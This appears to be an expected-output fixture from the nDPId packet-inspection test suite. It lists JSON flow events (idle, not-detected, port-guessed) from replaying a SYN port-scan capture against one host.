+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":843,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Oracle","breed":"Acceptable","category":"Database"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1521,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058906,"flow_last_seen":1278275058906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1039,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1072,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 